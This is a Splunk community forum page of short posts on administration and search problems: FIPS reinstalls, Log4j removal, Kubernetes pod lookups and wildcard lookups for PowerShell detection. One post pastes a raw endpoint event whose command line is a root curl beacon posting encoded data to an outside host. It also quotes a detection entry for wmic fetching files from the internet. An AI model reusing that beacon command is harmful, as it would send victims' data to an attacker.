All Posts

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Posts

@YJ , In Splunk UBA version 5.3.0, all Log4j related jars in the OS packages have either been removed or replaced by Reload4j besides the following. https://docs.splunk.com/Documentation/UBA/5.3.0/... See more...
@YJ , In Splunk UBA version 5.3.0, all Log4j related jars in the OS packages have either been removed or replaced by Reload4j besides the following. https://docs.splunk.com/Documentation/UBA/5.3.0/ReleaseNotes/RemoveLog4j If you are below version 5.3.0 I would update.
Red Hat 8.10 or 9.2 are not support as of yet, however you can try an install based on the older kernel version "4.18.0-477.27.1.el8_8.x86_64" that is supported. I have had some luck before by using ... See more...
Red Hat 8.10 or 9.2 are not support as of yet, however you can try an install based on the older kernel version "4.18.0-477.27.1.el8_8.x86_64" that is supported. I have had some luck before by using the older kernel with an updated system but know that its not supported.  **There may be some bugs that haven't been tested yet by doing this but it will allow you to install.
Here is the event: {"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"4131287454091... See more...
Here is the event: {"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"41312874540918","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1715545935.034","SVUID":"0","EventOrigin":"1","id":"92d99f91-6970-4f66-a38a-762e6b2af7b9","EffectiveTransmissionClass":"2","Tags":"12094627905582, 12094627906234","timestamp":"1715545919041","ProcessGroupId":"32517225337224","event_simpleName":"ProcessRollup2","RawProcessId":"17459","RootPath":"/","GID":"0","SVGID":"0","MD5HashData":"b194675c8ea858f2ed21214e9bbfc16b","SHA256HashData":"14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da","UID":"0","CommandLine":"curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=IYtBsvtfYai1wFsAeUU1ad8hCB8fX2hRrPvM%2bfwQVOb30LoDJluceAyV5jg75J8bHbinyYONJqjAbsrxiZwsLcFKHE59NwzNLLBkZ88ZBNu%2bc%2bGO2WxnITbXkXZyQJkMbdXlnnAwJ602gWkuOhmsiw3Ft5c%2b4Tduq615Hllj4u5whtm9TQxay%2bOQy4mVeJ7tfurRODGqsHw6mlsjXSpmgNUA5cSDVkiuc1pCzMugiOur5Dh2XoG7ABj%2bfEjEBe33hjD6431XFaKA8YkUoLJ424pYBhiFc%2bSK7Xd1csiCYwK4jwO98E4%2f8vLn37nFw8a2Uwiy8lOeP1e1skwDMccJR7jhAndmIQtSL1GruLm9lUpGwt%2b%2bmm%2bwawKl6NEca%2bNLJeWq7EcnfpPsZzPkV9kpyPu8Pz2mrZy%2fkKoXUEoeP0IOg6sRDrYu4%2bDNhcLT3znS8OqBxi%2bZypOcnABSwamvRXP048qJHQx7pm7yPkMaG20VjGtP48RUNGM2jloRNtbgHfJW2D3BmRp2De8rNRp5fdnzKB0i%2fUfYQ%2fWbLxYoZ4LQv3YEvT6XssTi1yScdJj3miAD%2b9Q5y4R1%2fLKUO9BUIeKvf0Zm23k7BSiqznd2skvuqUo4gb6JPwPW4zpctCiAKwZlKDY4AbZe1gBkJJWrrv%2bJ8VJTP37W5fTFtsqqTEc8ziL40%2bvqes1NLAiSEN31ABppkOmgZtkPXrC42utxYLjeMC06Raic6iLmymZo%2f5UrD31SshEm5k6KvVdZ2Bf%2fsPPjsf8uXfzhTxDmvWgYcVAkbvsukaVBQcrvqxXd1zSKbgTWEO41uXWdPSNqZtHj2TubS%2flCikiJPYX1zMhjsFFvkGlPIyTz%2bgCvm3JzLlcVT%2fLWJ216l4ozrD0%2b2Gq4wHuUlE8zcHZo00Vo9ysmAqEQ8HoWVzr1ZRRY7Lfn%2bhS0V7Uvlt65JDEm%2bA3aRcwNDBiNjkYNrU3LfTnBdCKgE1b8qpzcwoJMuPNadSZLPa3gKP%2fLXWNN266rW%2f1bqg5exR%2bk8D2ipueAUYYuJlCvsyvvU%2bh%2fF6zyJzqKN8zpy1tWtpGPBzFEbxixjBozX3LfficGlz1hDuLEclKKpH8rpOHSwsXrHGX%2fEiN5NRx4tPyR%2bGWmPMXm94ZazpH153EW0ixtQNaJJBBkR1Jmave6xacXustk9Tz67EcB0cPY2cEL%2bKzTVm%2fv7mEJRO2ohkzGmfBYsncbzBB3CssQp%2fSNcOoX%2fFl%2bBKiA3YSGiOuLv4nPG84PkfOKwTd7irZF3evTl4GEg8Ajkm54fMf5kFY1v3fH3b9NfPwZDMlDKOCNMYJuhXmglCdI1FQsJiIlyPZVrY21YcmQgGfJT7Bau64wq%2bHfP2p9P1oyU4%2f3mkH3tkWb%2bL754Ss%2fIRl%2fFFY9rOHOt7kBphaFgB9JEaoxFTtIYy%2fT66BXmr957lKlBiJg08FYBYE1PR6%2bPwMiCftCu2tdU3HulvTGR1Exc4shovJAVgq6iwWYHmpZo%2bqRuM8cz1itutz%2b%2bm7ZQDlbaiU1%2bSvDGOgBU%2f423vojnbrHKb6hYQIS%2bGrSBUuJBeZHLiKOfkPfsFvNYZIcmD%2bRkNCgwf4nTooOIY5GffKGH0LOPeT8RZzOcytEBjyu9%2fMQVIonZMc73lavnz7uPCRtGiezB%2fjkFj5UkSplosXjlN%2fyQbfoR5RQhUcgVKQpoSGrSUeT%2bSRyrV5QBtDwHTykUIzAUu%2bUvC3Vfwe0Oz24TCTfRFm%2bKhHGEt7v9PB8NZ0oCzkMwR6VerNptlspoWGjr91j0OXB6hlxjDxOD%2bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bj0%3d&version=Y9Ml9TL3Ayxy77SNYVWxkLuS7eHa4%2bBQxFHVCdAP%2f%2fw%3d","TargetProcessId":"43142923935709","ImageFileName":"/usr/bin/curl","RGID":"0","SourceThreadId":"0","RUID":"0","ProcessStartTime":"1715545934.678","aid":"42ab2efd409d492ba5f376f467370a44","cid":"09919f785a7e46ef8c53da25fbd9d186"} It should match with this lookup entry: wmic*get*http Using wmic to get and run files from internet   It does matches but I am just not able to display command and description in my final result.   Thank you
FIPS has to be turned on before starting Splunk.  If you've already started Splunk then you'll have to remove it and re-install it.  See https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Se... See more...
FIPS has to be turned on before starting Splunk.  If you've already started Splunk then you'll have to remove it and re-install it.  See https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/SecuringSplunkEnterprisewithFIPS
If you include the wildcards in your lookup matching field and define the lookup to use WILDCARD matching, you may be able to lookup a field in the lookup when there is a wildcard match. Please share... See more...
If you include the wildcards in your lookup matching field and define the lookup to use WILDCARD matching, you may be able to lookup a field in the lookup when there is a wildcard match. Please share some anonymised events and contents of your lookup so we can see the sorts of things you are trying to match.
Some context: I have a scripted input that sends the output of kubectl get po -A --show-labels into the abc index and kubectl sourcetype. Each pod has the importance label with a value of either crit... See more...
Some context: I have a scripted input that sends the output of kubectl get po -A --show-labels into the abc index and kubectl sourcetype. Each pod has the importance label with a value of either critical or non-critical. Some pods havent had that label applied as of yet, that is why I had the fill null importance lines in my original query. Agree that they can be ignored for this task. An event in the index would look something like this:  _time namespace pod_name importance etc.... The other fields are irrelevant to this search. This data gets ingested into splunk every minute. Each pod's name is unique (one container per pod) so i believe the lookup table wildcard pod groups will map to the individual pod. For example, there would only be one apache pod, not apache-2 and apache-12. I dont believe there are any concerns with the grouping. When I say that I know the data is missing, I mean that there is a pod (kafka) that hasnt been deployed for over a week. It is not being reported by the scripted input I mentioned earlier. That pod is listed in the pod lookup as (kafka-*) Unfortunately I am unable to provided screenshots. The trouble I am having with the query you generously shared is that when it runs and gets visualized as a line chart with the 24h time range picked, the kafka pod shows a count of 1(missing) 24 hours ago, then goes to 0 for the rest of time up until the current hour, where it returns to 1. Nothing changed during that time with the actual deployment status of that pod.
You don't need a dashboard to create a search - just use the search and reporting interface to find the events you are interested in. Do you know what these events are?
Do you have a report that identifies the employees that were added in the previous month?
No. i dont have customized dasboard, can you please share some reference query?
Please share the event which was supposed to have matched and the entry in the lookup that it should have matched to
Hey guys, I am working a report that needs to show any new employees coming into the company for the last 30 days. Right now I have a report constructed that pulls data for over the last 30 days on a... See more...
Hey guys, I am working a report that needs to show any new employees coming into the company for the last 30 days. Right now I have a report constructed that pulls data for over the last 30 days on all employees for the company. How can I filter out this report to only show employees added to the company the previous month over the last 30 days? I will schedule this report to run weekly.
I installed Splunk Enterprise 9.2.0.1 without FIPS mode on and now I found out, I need to have it on. Luckily, I haven't done too much work, just one server and few Universal forwarders.    I belie... See more...
I installed Splunk Enterprise 9.2.0.1 without FIPS mode on and now I found out, I need to have it on. Luckily, I haven't done too much work, just one server and few Universal forwarders.    I believe, I have to scrap the current installation of SH/Indexer and all the UFs, correct? There is not way to enable it in current install as far as I can tell.   Also, are there any files, I could save, so I can reuse them?  
I tried with lookup definition "WILDCARD(commands)" but that didn't work!
Hello Community! I am trying to set up a search to monitor Powershell commands from Windows hosts; specifically, I am starting from: an index with the full messages related to PS commands, contain... See more...
Hello Community! I am trying to set up a search to monitor Powershell commands from Windows hosts; specifically, I am starting from: an index with the full messages related to PS commands, contained in a field named "Message" (related, for example, to event codes 4101, 800, etc...) a .csv file, with the list of commands I would like to monitored, contained in a column named "PS_command". From these premises, I have already constructed a search that leverages on inputlookup to search the strings from the PS-monitored.csv file to the index field Message, outputting the result in a table, as the following (adding also details from the index: _time, host and EventCode).   index="wineventlog" | search ( [|inputlookup PS-monitored.csv | eval Message= "*" + PS_command + "*" | fields Message] ) | table _time host EventCode Message    This, despite not being the most elegant solution (with the addition of wildcard characters *), is currently working, however I would also like to include the original search field (PS_command column from PS-monitored.csv) to the final table. I tried to experiment a bit with lookup command, and with join options, without success; does anyone have some suggestions? Finally, I would like avoid using heavy commands, such as join, if at all possible. Thanks in advance!
To use wildcards in lookups they have to be defined as match type WILDCARD https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_looku... See more...
To use wildcards in lookups they have to be defined as match type WILDCARD https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition  
Start with a search that returns the data you are interested in visualising. Do you have this already?
What do you get when you try this? index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error | rex field=message "Message=.* \((?<apiName>\w+?) -" | ... See more...
What do you get when you try this? index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error | rex field=message "Message=.* \((?<apiName>\w+?) -" | chart count over client by apiName
Hello Shubham, In addition to Ryan suggestion, I'm posting more useful links for your ref if incase those may help. Please note AppDynamics moved extensions under an open-source model, to enable... See more...
Hello Shubham, In addition to Ryan suggestion, I'm posting more useful links for your ref if incase those may help. Please note AppDynamics moved extensions under an open-source model, to enable customers to directly evolve them to suit their needs / build new use cases, you can find more information  https://docs.appdynamics.com/display/PAA/Support+Advisory%3A+Changes+to+Extensions+Support+ModelWe have also documented answers to most common extension queries along with troubleshooting tips and tricks in the following links. Extensions troubleshooting Advanced Extensions Troubleshooting Best Regards, Rajesh Ganapavarapu
Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connecti... See more...
Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connection USERNAME APPLICATION:PORT & PROTOCOL APPLICATION SEGMENTS ACCESS POLICY NAME ACTION how can i create customized dashboard, please suggest.
It would help if you could share some anonymised raw events in a code block to prevent formatting corruptions, that way we can see what you are working with and be better able to guide you.